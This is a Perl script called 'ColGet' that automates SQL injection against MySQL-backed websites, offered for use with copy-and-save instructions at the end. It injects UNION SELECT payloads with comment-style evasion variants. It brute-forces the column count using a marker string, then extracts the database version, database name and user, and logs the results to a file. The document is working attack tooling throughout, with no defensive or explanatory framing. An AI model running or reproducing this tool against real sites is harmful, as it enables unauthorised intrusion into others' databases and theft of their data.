#!/usr/bin/perl
#ColGet v1.0
#By uNk
use LWP::UserAgent;
use HTTP::Request;
sub help
{
system('cls');
system('title MySQL Column And Info Get');
print "\n\n ------------------Welcome to ColGet------------------\n";
print "[+] How to use:\n";
print "\n\n-> [-] SQLi\n";
print " !getcol ---- Column get [Works on both version of MySQL]\n";
print "Example: http://www.site.com/page.php?id=1 [ENTER] \n";
print " !getinfo ---- Get global infos [Works on both version of MySQL]\n";
print "Example: http://www.site.com/page.php?id=1+union+select+1,2,1nj3ct,3-- [ENTER] \n";
print "\n\n-> [-] Options\n";
print " !h ---- Shows commands to use/help\n";
print "\n\n-> [-] Information\n";
print " This tool is created by uNk\n";
print " Converted some parts from Python [SchemaFuzz]\n";
exit();
}
sub variables
{
my $i=0;
foreach (@ARGV)
{
if ($ARGV[$i] eq "!getcol"){$mysql_count_target = $ARGV[$i+1]}
if ($ARGV[$i] eq "!getinfo"){$mysql_details_target = $ARGV[$i+1]}
if ($ARGV[$i] eq "!h"){&help}
$i++;
}
}
sub main
{
system('cls');
system('title MySQL Column And Info Get');
print " My-\n" ;
print " SQL--\n" ;
print " V4-----\n" ;
print " V5------\n" ;
print " \n MySQL Column And Info Get \n\n";
if (@ARGV<1){print "[+] Type this command to get help: !h\n\n" ;}
}
sub mysqlcount
{
my $site = $_[0];
my $ev = $_[1];
my $null = "09+and+1=" ;
my $code = "0+union+select+" ;
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
my $injection = $site.$null.$code."0",$com ;
my $useragent = LWP::UserAgent->new();
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->get($injection);
my $result = $response->content;
if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
{
print "\n[!] Site is vulnerable!\n" ;
print "[+] Getting columns now... [Please wait]\n";
}
else
{
print "\n[!] Sorry, this site is not vulnerable.\n";
exit();
}
for ($i = 0 ; $i < 100 ; $i ++)
{
$col.=','.$i;
$specialword.=','."0x617a38387069783030713938";
if ($i == 0)
{
$specialword = '' ;
$col = '' ;
}
$sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
$ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
$rq = $ua->get($sql);
$response = $rq->content;
if($response =~ /az88pix00q98/)
{
$i ++;
print "\n[+] Finished !\n" ;
print "[-] $i Column numbers\n" ;
$sql=$site.$null.$code."0".$col.$com ;
print "-> ".$sql ."\n\n";
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "Target : $site\n";
print vuln_file "Evasion : $ev\n";
print vuln_file "Columns : $i\n";
print vuln_file "1nj3ct10n : $sql\n";
close(vuln_file);
print "[!] Saved to $vulnfile\n";
}
exit () ;
}
}
}
sub mysqldetails
{
my $site = $_[0];
my $ev = $_[1];
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
print "\n[+] Info started [Pl0x w8]....\n\n";
if ($site =~ /(.*)1nj3ct(.*)/i)
{
my $newlink = $1.$selection.$2.$com;
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newlink);
my $content = $request->content;
if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
{
print "[+] DB Version : $1\n";
print "[+] DB Name : $2\n";
print "[+] DB Username : $3\n";
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[+] Target : $site\n";
print vuln_file "[+] Evasion : $ev\n";
print vuln_file "[+] DB Version : $1\n";
print vuln_file "[+] DB Name : $2\n";
print vuln_file "[+] DB Username : $3\n";
close(vuln_file);
print "\n[!] Saved to $vulnfile\n";
}
exit () ;
}
else
{
print "[-] Failed.\n";
exit () ;
}
}
else
{
print "[!] You may have entered the link incorrectly, please make sure it's in this format:\n http://site.com/page.php?id=1+union+select+1,2,1nj3ct,4,5--\n";
exit () ;
}
}
variables();
main();
if (defined($mysql_count_target))
{
print "[!] Column Get\n\n" ;
print "[!] Target : $mysql_count_target\n" ;
if ($evasion eq '/*')
{
print "[-] Evasion : /**/\n" ;
}
elsif ($evasion eq '%20')
{
print "[-] Evasion : %20\n" ;
}
else
{
print "[-] Evasion : --\n" ;
$evasion = "--"
}
mysqlcount($mysql_count_target,$evasion);
}
if (defined($mysql_details_target))
{
print "[+] DB Info\n\n" ;
print "[-] Target : $mysql_details_target\n" ;
if ($evasion eq '/*')
{
print "[-] Evasion : /**/\n" ;
}
elsif ($evasion eq '%20')
{
print "[-] Evasion : %20\n" ;
}
else
{
print "[!] Evasion : --\n" ;
$evasion = "--"
}
mysqldetails($mysql_details_target,$evasion);
}
Copy it, open notepad> paste it> save it as .pl
